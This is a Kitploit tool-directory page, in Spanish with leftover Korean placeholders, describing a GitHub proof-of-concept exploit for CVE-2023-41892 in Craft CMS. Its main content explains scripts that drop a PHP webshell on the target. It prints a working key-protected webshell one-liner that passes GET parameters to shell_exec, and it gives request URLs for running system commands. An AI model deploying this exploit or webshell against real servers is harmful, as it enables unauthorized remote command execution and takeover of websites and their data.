Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-41892_poc — Personalizado esto para mi propio uso | Kitploit
Herramientas/GitHubGitHub/user01-1/cve-2023-41892_poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebComando y Control
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

Personalizado esto para mi propio uso

Ver Repositorio
hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-41892_poc

Personalizado para mi propio uso

poc_noauth.py

  • Webshell PHP básico de una sola línea
  • Ejecución de comandos del sistema operativo mediante ?cmd=<명령어>

poc_auth.py

  • Webshell con autenticación simple basada en clave (método de comparación de hash SHA-256)
  • Solo se pueden ejecutar comandos si se introduce la clave correcta
  • Requiere modificación del código:
    • En la variable webshell dentro de la función drop_payload, cambia la parte YOUR_SECRET_KEY por el valor hash SHA-256 de la clave deseada
  • Método de uso:
    1. Sustituye YOUR_SECRET_KEY dentro de webshell → por el valor hash SHA-256 de la clave en texto plano
    2. Al realizar la solicitud, envía la clave en texto plano
      root@kitploit:~
      {target}/shell.php?k=<평문키>&c=<명령어>
      
  • Ejemplo:
    1. Configuración: clave en texto plano = test1234
    2. Calcula el hash SHA256 mediante cyberchef, etc.: 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef, etc.
    3. Modifica el código:
      root@kitploit:~
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      

Método de uso

python poc_noauth.py {타겟}

Descargar herramienta